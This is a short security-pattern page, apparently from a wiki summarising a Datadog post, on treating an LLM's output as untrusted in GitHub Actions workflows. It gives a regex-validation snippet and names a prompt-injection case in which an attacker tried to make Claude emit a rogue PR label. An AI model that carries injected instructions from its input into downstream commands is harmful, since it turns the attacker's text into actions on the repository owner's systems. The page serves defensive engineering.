Skip to content

PATTERN Cited by 1 source

LLM output as untrusted input

Problem: An LLM exposed to attacker-controllable input (even well-isolated via patterns/untrusted-input-via-file-not-prompt) can still produce output that reflects or carries injected instructions. If downstream steps consume that output verbatim โ€” as a shell argument, a label name, a command, a file path โ€” the injection propagates.

Pattern: Treat the LLM's output as untrusted. Validate structure before using it; fail-closed on mismatch.

Shape

From Datadog's 2026-03-09 reference workflow:

- name: Read Claude's output
  id: category
  run: |
    read -r CATEGORY < category.txt || true
    if [[ "$CATEGORY" =~ ^(new-feature|bug-fix|documentation)$ ]]; then
      echo "value=$CATEGORY" >> "$GITHUB_OUTPUT"
    else
      echo "::error::Unexpected category"
      exit 1
    fi

- name: Apply label
  env:
    PR_NUMBER: ${{ github.event.pull_request.number }}
    GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
    CATEGORY: ${{ steps.category.outputs.value }}
  run: gh pr edit "$PR_NUMBER" --add-label "kind/$CATEGORY"

Three things happening:

  1. Regex validator pins the output to an enumerable, known-safe set (^(new-feature|bug-fix|documentation)$). Fail-closed if the LLM returns anything else.
  2. Fresh env: interpolation on the downstream step โ€” the validated output goes through the env-var pattern, not string interpolation, to compose with script-injection defences.
  3. Least-privilege secret placement โ€” GH_TOKEN is scoped to the step that needs it, not the job/workflow.

Why it matters

Datadog's framing: "Consider the LLM output as untrusted and apply similar sanitization that you would apply for untrusted user data such as a PR title." Concretely, if the LLM can be induced to output a label-name like HackerBot Claw ๐Ÿฆž Reviewed ๐Ÿ›ก๏ธ (as hackerbot-claw attempted), and your downstream step is gh pr edit --add-label "$CATEGORY", the validator is what stops the attack from succeeding even if the LLM itself was compromised.

Sibling patterns

One of five defensive patterns from Datadog's 2026-03-09 post:

  1. Use recent models.
  2. patterns/untrusted-input-via-file-not-prompt.
  3. LLM output as untrusted input โ€” this pattern.
  4. patterns/minimally-scoped-llm-tools.
  5. Keep secrets out of the LLM's step environment.

Seen in

Last updated ยท 200 distilled / 1,178 read